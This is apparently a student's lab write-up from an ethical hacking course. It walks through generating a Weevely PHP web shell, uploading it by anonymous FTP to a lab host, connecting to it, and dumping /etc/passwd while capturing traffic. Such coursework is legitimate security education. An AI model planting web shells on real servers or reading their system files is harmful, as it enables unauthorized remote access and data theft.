> For the complete documentation index, see [llms.txt](https://paul-gleason.gitbook.io/sec-335-eth.-hacking-and-pen.-testing/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://paul-gleason.gitbook.io/sec-335-eth.-hacking-and-pen.-testing/labs/lab-8.1-weevely.md).

# Lab 8.1: Weevely

### Deliverable 1. Provide a screenshot that shows the relevant tcp stream similar to the one below. Create a capture filter on port 80 when you do so.

<figure><img src="/files/XB06Y4zHoOvVlkFH9974" alt=""><figcaption></figcaption></figure>

### Deliverable 2. Investigate weevely (a tool in kali). Create a php agent that is uniquely named, upload the agent to pippin and carry on a session similar to the one shown in the screenshot. Provide a screenshot of your session.

```bash
sudo weevely generate <Passwd> <File Output>
```

<figure><img src="/files/duDltKenDquxbziHaLLm" alt=""><figcaption><p>Example of what I did</p></figcaption></figure>

Upload php file to 10.0.5.25

```bash
ftp 10.0.5.25
Anonymous
no@gmail.com
cd upload
put 
./paul_weevely.php
paul_weevely.php
```

Now create the connection

```bash
weevely https://<ip>/<local>.php <passwd>
```

<figure><img src="/files/CL1pHc4It7SBoOmeDCRk" alt=""><figcaption></figcaption></figure>

### Deliverable 3. Provide a screenshot similar to the one below that displays the encoded tcp stream from a weevely dump of /etc/passwd. Make sure to use a capture filter of port 80, to limit traffic.

<figure><img src="/files/eP9cF1acTLGKAqi7PtL7" alt=""><figcaption></figcaption></figure>
